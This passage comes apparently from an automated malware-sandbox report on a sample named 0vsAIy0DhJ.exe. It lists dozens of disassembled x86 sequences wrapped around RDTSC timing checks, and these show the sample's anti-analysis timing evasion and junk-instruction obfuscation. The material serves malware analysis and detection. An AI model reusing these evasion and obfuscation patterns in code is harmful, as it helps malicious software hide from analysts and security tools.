0x0000004f push 00000000h 0x00000051 push ebp 0x00000052 call 00007EFD88CA6408h 0x00000057 pop ebp 0x00000058 mov dword ptr [esp+04h], ebp 0x0000005c add dword ptr [esp+04h], 00000016h 0x00000064 inc ebp 0x00000065 push ebp 0x00000066 ret 0x00000067 pop ebp 0x00000068 ret 0x00000069 mov dword ptr [ebp+122D2766h], edi 0x0000006f push esi 0x00000070 cmc 0x00000071 pop edi 0x00000072 nop 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 915FDD second address: 915FE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 911E70 second address: 911E74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 912FB8 second address: 912FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9162BA second address: 9162D6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD88CA640Eh 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 912FBC second address: 912FCB instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFD88B5ADB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 917058 second address: 917086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFD88CA6417h 0x00000008 jne 00007EFD88CA6406h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007EFD88CA6408h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 917F9A second address: 917FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 917FA3 second address: 917FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 919E73 second address: 919E78 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 919E78 second address: 919EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007EFD88CA6414h 0x0000000f cld 0x00000010 push 00000000h 0x00000012 sub dword ptr [ebp+122D229Ch], edx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007EFD88CA6408h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 jmp 00007EFD88CA6414h 0x00000039 xchg eax, esi 0x0000003a jns 00007EFD88CA641Ah 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push edx 0x00000044 push ecx 0x00000045 pop ecx 0x00000046 pop edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 919EF6 second address: 919F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007EFD88B5ADB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 91911A second address: 919120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9171EB second address: 9171F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 91A04D second address: 91A0E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6411h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007EFD88CA6423h 0x00000010 jne 00007EFD88CA641Dh 0x00000016 nop 0x00000017 add bx, 3911h 0x0000001c push dword ptr fs:[00000000h] 0x00000023 sub dword ptr [ebp+122D3525h], ebx 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007EFD88CA6408h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov eax, dword ptr [ebp+122D0415h] 0x00000050 xor dword ptr [ebp+1245D313h], edx 0x00000056 push FFFFFFFFh 0x00000058 push ebx 0x00000059 sub dword ptr [ebp+122D17F0h], esi 0x0000005f pop ebx 0x00000060 nop 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 push esi 0x00000065 pop esi 0x00000066 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 91AFCE second address: 91AFD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 91A0E0 second address: 91A0E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9171F1 second address: 917261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push dword ptr fs:[00000000h] 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007EFD88B5ADB8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a cmc 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 or edi, dword ptr [ebp+12450F8Ah] 0x00000038 mov eax, dword ptr [ebp+122D0A71h] 0x0000003e xor ebx, dword ptr [ebp+122D38B5h] 0x00000044 push FFFFFFFFh 0x00000046 mov di, 2511h 0x0000004a mov dword ptr [ebp+122D1F94h], edi 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007EFD88B5ADC5h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 91A0E4 second address: 91A0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 91BF6A second address: 91BFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007EFD88B5ADB8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 ja 00007EFD88B5ADCFh 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D2AADh], ecx 0x00000030 push 00000000h 0x00000032 jmp 00007EFD88B5ADC8h 0x00000037 sub ebx, 7D6433B4h 0x0000003d xchg eax, esi 0x0000003e jnc 00007EFD88B5ADCAh 0x00000044 pushad 0x00000045 jmp 00007EFD88B5ADC0h 0x0000004a pushad 0x0000004b popad 0x0000004c popad 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push esi 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 91BFF6 second address: 91BFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 91BFFB second address: 91C005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007EFD88B5ADB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 91E001 second address: 91E007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 91E8EC second address: 91E8F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8C2474 second address: 8C24BC instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFD88CA6408h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnc 00007EFD88CA6406h 0x00000013 jmp 00007EFD88CA6418h 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b pushad 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e push eax 0x0000001f pop eax 0x00000020 jmp 00007EFD88CA6410h 0x00000025 push eax 0x00000026 pop eax 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9286E7 second address: 9286EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9286EB second address: 9286FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 932C06 second address: 932C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 93214D second address: 932151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9322B1 second address: 9322B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9322B5 second address: 9322BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 932713 second address: 932749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD88B5ADBFh 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFD88B5ADBEh 0x00000013 jmp 00007EFD88B5ADC0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 932749 second address: 932753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9328CF second address: 9328D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 932A54 second address: 932A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 932A5A second address: 932A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 932A5E second address: 932A75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFD88CA6412h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9361CF second address: 9361E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007EFD88B5ADC4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 905112 second address: 905186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edi 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007EFD88CA6408h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 pushad 0x00000024 movsx eax, si 0x00000027 popad 0x00000028 mov edx, dword ptr [ebp+122D3659h] 0x0000002e lea eax, dword ptr [ebp+12478E8Ch] 0x00000034 call 00007EFD88CA6414h 0x00000039 mov ecx, 7CE34789h 0x0000003e pop ecx 0x0000003f nop 0x00000040 jmp 00007EFD88CA6417h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 905186 second address: 90519E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD88B5ADC3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90573B second address: 905770 instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFD88CA641Bh 0x00000008 jmp 00007EFD88CA6415h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007EFD88CA6410h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 905770 second address: 9057C1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFD88B5ADCDh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007EFD88B5ADB8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push 72C80A20h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push esi 0x0000002f pop esi 0x00000030 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9057C1 second address: 9057CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA640Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9058A4 second address: 9058A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 905944 second address: 905983 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFD88CA6408h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], esi 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007EFD88CA6408h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 sub ecx, dword ptr [ebp+122D38F1h] 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jo 00007EFD88CA6408h 0x00000036 push edi 0x00000037 pop edi 0x00000038 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 905A62 second address: 905A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 905C45 second address: 905C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007EFD88CA6412h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007EFD88CA6408h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 cmc 0x00000029 push 00000004h 0x0000002b and edx, 659C2E83h 0x00000031 push eax 0x00000032 pushad 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 905FE6 second address: 906034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007EFD88B5ADB6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007EFD88B5ADC7h 0x00000012 nop 0x00000013 mov edx, dword ptr [ebp+122D2AD8h] 0x00000019 push 0000001Eh 0x0000001b add dword ptr [ebp+122D3525h], ecx 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007EFD88B5ADC8h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 906034 second address: 906039 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 906169 second address: 906176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 90642E second address: 9064A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6411h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007EFD88CA641Eh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007EFD88CA6408h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b pushad 0x0000002c add bl, 00000071h 0x0000002f popad 0x00000030 lea eax, dword ptr [ebp+12478E8Ch] 0x00000036 xor dx, 0F3Ch 0x0000003b nop 0x0000003c push eax 0x0000003d push edx 0x0000003e push ebx 0x0000003f jl 00007EFD88CA6406h 0x00000045 pop ebx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9064A1 second address: 9064BE instructions: 0x00000000 rdtsc 0x00000002 je 00007EFD88B5ADB8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007EFD88B5ADBCh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9064BE second address: 9064D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6416h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9064D8 second address: 9064F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD88B5ADC9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9064F5 second address: 8EE3D1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jp 00007EFD88CA6406h 0x0000000f call dword ptr [ebp+1244C146h] 0x00000015 jc 00007EFD88CA641Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8EE3D1 second address: 8EE3D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 8EE3D5 second address: 8EE3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 936DFF second address: 936E1E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007EFD88B5ADB6h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007EFD88B5ADC1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 93B81E second address: 93B824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 93B824 second address: 93B82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 93BE22 second address: 93BE3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6418h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 93C2D3 second address: 93C2DD instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFD88B5ADB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 943E18 second address: 943E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 943E21 second address: 943E70 instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFD88B5ADC9h 0x00000008 jmp 00007EFD88B5ADC3h 0x0000000d jo 00007EFD88B5ADD6h 0x00000013 jmp 00007EFD88B5ADC5h 0x00000018 jmp 00007EFD88B5ADBBh 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push esi 0x00000020 pushad 0x00000021 push edi 0x00000022 pop edi 0x00000023 jc 00007EFD88B5ADB6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 9442C3 second address: 944306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA640Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007EFD88CA640Eh 0x0000000f push edx 0x00000010 pop edx 0x00000011 jbe 00007EFD88CA6406h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007EFD88CA6411h 0x0000001f jmp 00007EFD88CA6412h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 944306 second address: 94430A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94430A second address: 94433C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007EFD88CA6406h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007EFD88CA640Eh 0x00000012 pushad 0x00000013 jmp 00007EFD88CA640Dh 0x00000018 jno 00007EFD88CA6406h 0x0000001e push edi 0x0000001f pop edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 944493 second address: 944497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 944497 second address: 9444AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007EFD88CA640Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 944636 second address: 94463A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 94463A second address: 944641 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 944641 second address: 944647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 944647 second address: 94464D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
